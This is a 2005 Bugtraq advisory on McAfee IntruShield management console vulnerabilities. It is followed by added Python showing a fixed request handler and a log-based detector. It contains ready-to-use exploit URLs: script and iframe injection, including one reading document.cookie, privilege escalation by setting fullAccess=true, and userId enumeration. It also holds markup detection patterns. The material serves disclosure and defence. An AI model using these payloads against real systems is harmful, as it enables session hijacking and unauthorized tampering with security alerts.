McAfee Intrushield IPS Abuse

c0ntexb_at_gmail.com
Date: 07/06/05

    Date: 6 Jul 2005 15:03:06 -0000
    To: bugtraq@securityfocus.com

    /*
      *****************************************************************************************************************
      $ An open security advisory #8 - McAfee Intrushield IPS Management Console Abuse
      *****************************************************************************************************************
      1: Bug Researcher: c0ntex - c0ntexb[at]gmail.com
      2: Bug Released: July 06 2005
      3: Bug Impact Rate: Medium / High
      4: Bug Scope Rate: Local / Remote
      *****************************************************************************************************************
      $ This advisory and/or proof of concept code must not be used for commercial gain.
      *****************************************************************************************************************

      McAfee IntruShield Security Management System
      http://www.mcafeesecurity.com/us/products/mcafee/network_ips/category.htm

      "The McAfee IntruShield Security Management System is an advanced solution for administering IntruShield
      sensor appliance deployments. The IntruShield Security Management System (ISM) can support both large and
      small network intrusion prevention system (IPS) deployments and can scale up to several hundred sensor
      appliances. By integrating a comprehensive set of Best-in-Class security management functions, the
      IntruShield Security Management System dramatically simplifies and streamlines the complexities associated
      with IPS configuration, policy compliance, and threat and response management."

      I have found some security vulnerabilities in this product whereby a user can elevate their privileges from
      a user that can only view alerts logged by remote sensors, to a scenario where the user can gain access to
      acknowledge, accept and delete alerts and access the Management Console. It is also possible to inject
      malicious HTML and JavaScript into the URLs and have this malicious script run on the client's machine,
      allowing for account information hijacking.

      A new version has been released to address these bugs and can be downloaded from their site.

    */

      Issues:
      1) Inject HTML
      2) Inject JavaScript
      3) Access privileged reports
      4) Acknowledge and delete alerts
      5) Gain access to Management Console

      Note: for issues 1 - 4, the attacker needs a valid user account.

      1) It is possible to embed HTML into the MISMS: the value of the thirdMenuName parameter is written into the
      page without being escaped. This could allow phishing attacks to be performed against a valid Manager account,
      for example by loading an attacker-chosen page in an IFRAME inside the console:

      https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=<iframe%20src="http://www.mcafeesecurity.com/us/about/press/corporate/2005/20050411_185504.htm"%20width=800%20height=600 ></iframe>&severity=critical&count=1

      2) It is possible to embed JavaScript into the MISMS, here through the resourceName parameter, and have the
      embedded script execute in the security context of the user browsing the Management System. The second
      alert() in the example shows that the user's session cookie is reachable from the injected script:

      https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&faultResourceName=Manager&domainName=Demo&resourceName=<script>alert("There could be trouble ahead")</script><script>alert(document.cookie)</script>&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1

      3) It is possible to access the restricted "Generate Reports" section of the MISMS, so a non-privileged user
      can obtain important information about the configuration and set-up of the IPS devices managed by the
      service. This is achieved simply by changing the fullAccessRight parameter in the URL from false to true:

      https://intrushield:443/intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&selectedDomain=0&fullAccessRight=true

      4) It is possible to acknowledge, de-acknowledge and delete alerts from the MISMS console by modifying the
      URLs sent to the system, again simply by changing the fullAccess parameter from false to true:

      https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&faultResourceName=Manager&domainName=%2FDemo%3A0&resourceName=%2FDemo%3A0%2FManager&resourceType=Manager&topMenuName=SystemHealthManager&secondMenuName=Faults&resourceId=-1&thirdMenuName=Critical&severity=critical&count=1

      Each change is e-mailed to the administrator; however, the e-mail only says that "someone" made a change, so it
      does not identify which account did it.
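      The root cause of issues 3 and 4 is that the page takes the caller's privilege level from a query parameter the
      client controls, and the root cause of issues 1 and 2 is that parameter values are written into the page without
      escaping. The following is an added example, not McAfee's code and not from the advisory: a hypothetical Python
      handler that shows the vulnerable pattern next to the corrected one (rights derived from the server-side session,
      reflected values HTML-escaped). Session, the role names, the handle_system_event_* functions and the two sample
      URLs are assumptions modelled on the advisory's URLs.

```python
"""
Added example (not McAfee's code): a handler that takes its privilege level from
the client-supplied ``fullAccess`` query parameter, as the advisory describes,
next to one that derives it from the server-side session and HTML-escapes what
it reflects. Session, the role names and the handler names are hypothetical.
"""
from dataclasses import dataclass
from html import escape
from urllib.parse import urlsplit, parse_qs


@dataclass(frozen=True)
class Session:
    user: str
    role: str  # "viewer" (may only look at alerts) or "manager"


def params_from_url(url):
    """Decode the query string of a console URL into a flat dict (first value wins)."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query, keep_blank_values=True).items()}


def handle_system_event_vulnerable(session, params):
    """Trusts the URL: anyone who rewrites fullAccess=false to true gets the
    acknowledge/delete controls, and resourceName lands unescaped in the HTML."""
    full_access = params.get("fullAccess", "false").lower() == "true"
    actions = ["acknowledge", "delete"] if full_access else ["view"]
    html = "<h2>%s</h2>" % params.get("resourceName", "")
    return {"actions": actions, "html": html}


def handle_system_event_fixed(session, params):
    """Ignores fullAccess from the client: rights come from the session role,
    and every reflected value is escaped so <script>/<iframe> render as text."""
    full_access = session.role == "manager"
    actions = ["acknowledge", "delete"] if full_access else ["view"]
    html = "<h2>%s</h2>" % escape(params.get("resourceName", ""), quote=True)
    return {"actions": actions, "html": html}


# Constructed requests modelled on the advisory's URLs (host and values are illustrative)
TAMPERED = ("https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp"
            "?fullAccess=true&resourceName=%2FDemo%3A0%2FManager&severity=critical")
XSS = ("https://intrushield/intruvert/jsp/systemHealth/SystemEvent.jsp"
       "?fullAccess=false&resourceName=%3Cscript%3Ealert(document.cookie)%3C/script%3E")

if __name__ == "__main__":
    viewer = Session("alice", "viewer")
    print(handle_system_event_vulnerable(viewer, params_from_url(TAMPERED)))
    print(handle_system_event_fixed(viewer, params_from_url(TAMPERED)))
    print(handle_system_event_fixed(viewer, params_from_url(XSS))["html"])
```

      The fixed handler never reads fullAccess at all; the parameter can stay in the URL for backwards compatibility,
      but the server must treat it as a display hint at most, never as an authorization decision.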

      5) By default, all user ID values are passed in the URL in the clear, so it is trivial for an attacker to
      enumerate user IDs until a privileged Manager account is found. An example of this would look similar to:

      https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif
      https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif
      https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif
      https://intrushield:443/intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif

      This process can be continued until a valid user ID with privileges to access the configure screen is found.

      Since JavaScript can be run in the browsers of clients accessing the device, it would be possible to redraw the
      page with IFRAMEs and recreate the user login page to snoop usernames and passwords.
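      As an added detection example (not part of the advisory and not McAfee's code), the script below runs the three
      indicators the advisory gives over constructed access-log lines for the console: a non-manager account requesting
      fullAccess=true or fullAccessRight=true (issues 3 and 4), script or HTML markup in a query parameter (issues 1
      and 2), and a single client walking sequential userId values on disp.jsp (issue 5). The log format, account
      names, client addresses and the MANAGERS role table are constructed; the paths and parameter names are the ones
      that appear in the advisory's URLs.

```python
"""
Added example (not the advisory author's or McAfee's code): three detections
from the advisory run over constructed web-server access-log lines for the ISM
console. Log format, usernames, addresses and the MANAGERS set are constructed.
"""
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed: which console accounts hold the manager role (site-specific)
MANAGERS = {"admin"}

# Constructed combined-log-style lines: client ip, ident, user, timestamp, request, status, size
LOG = """\
10.0.0.5 - alice [06/Jul/2005:15:03:06 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&resourceName=%2FDemo%3A0%2FManager&severity=critical HTTP/1.1" 200 4120
10.0.0.5 - alice [06/Jul/2005:15:03:40 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&resourceName=%2FDemo%3A0%2FManager&severity=critical HTTP/1.1" 200 5210
10.0.0.5 - alice [06/Jul/2005:15:04:02 +0000] "GET /intruvert/jsp/reports/reports-column-center.jsp?monitoredDomain=%2FDemo&selectedDomain=0&fullAccessRight=true HTTP/1.1" 200 8801
10.0.0.7 - bob [06/Jul/2005:15:05:10 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=false&resourceName=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 3900
10.0.0.9 - - [06/Jul/2005:15:06:00 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=1&logo=intruvert.gif HTTP/1.1" 200 1200
10.0.0.9 - - [06/Jul/2005:15:06:01 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=2&logo=intruvert.gif HTTP/1.1" 200 1200
10.0.0.9 - - [06/Jul/2005:15:06:02 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=3&logo=intruvert.gif HTTP/1.1" 200 1200
10.0.0.9 - - [06/Jul/2005:15:06:03 +0000] "GET /intruvert/jsp/menu/disp.jsp?userId=4&logo=intruvert.gif HTTP/1.1" 200 1200
10.0.0.2 - admin [06/Jul/2005:15:07:00 +0000] "GET /intruvert/jsp/systemHealth/SystemEvent.jsp?fullAccess=true&resourceName=%2FDemo%3A0%2FManager HTTP/1.1" 200 5210
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ (?P<user>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)')
# Tags and attributes that have no business in a console menu/resource name
MARKUP_RE = re.compile(r"<\s*/?\s*(script|iframe|img|object|embed)\b|javascript:|on\w+\s*=", re.I)


def parse_line(line):
    """Split one log line into fields plus the decoded query parameters (None if unparseable)."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["params"] = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return rec


def detect(log_text, managers=MANAGERS, sweep_threshold=3):
    """Return a list of (rule, ip, user, detail) alerts for the given log text."""
    alerts = []
    user_ids_by_ip = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        p = rec["params"]
        # (a) privilege flag asserted by the client while the principal is not a manager
        for flag in ("fullAccess", "fullAccessRight"):
            if p.get(flag, "").lower() == "true" and rec["user"] not in managers:
                alerts.append(("priv-flag-tamper", rec["ip"], rec["user"], "%s=true on %s" % (flag, rec["path"])))
        # (b) markup or script in any parameter value; unquote again so a
        #     double-encoded probe (%253C...) is matched as well
        for key, val in p.items():
            if MARKUP_RE.search(unquote(val)):
                alerts.append(("xss-probe", rec["ip"], rec["user"], "%s=%r" % (key, val[:60])))
        # (c) collect distinct userId values per client for the enumeration check
        if rec["path"].endswith("/menu/disp.jsp") and "userId" in p:
            user_ids_by_ip[rec["ip"]].add(p["userId"])
    for ip, ids in user_ids_by_ip.items():
        if len(ids) >= sweep_threshold:
            alerts.append(("userid-sweep", ip, "-", "%d distinct userId values" % len(ids)))
    return alerts


if __name__ == "__main__":
    for alert in detect(LOG):
        print(alert)
```

      Rule (a) is the one that closes the gap the advisory notes in the e-mail notification: it ties the tampered request
      to the account that sent it, which the "someone made a change" message does not. The sweep threshold is a
      constructed value; tune it to how many distinct userId values a legitimate session ever touches.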

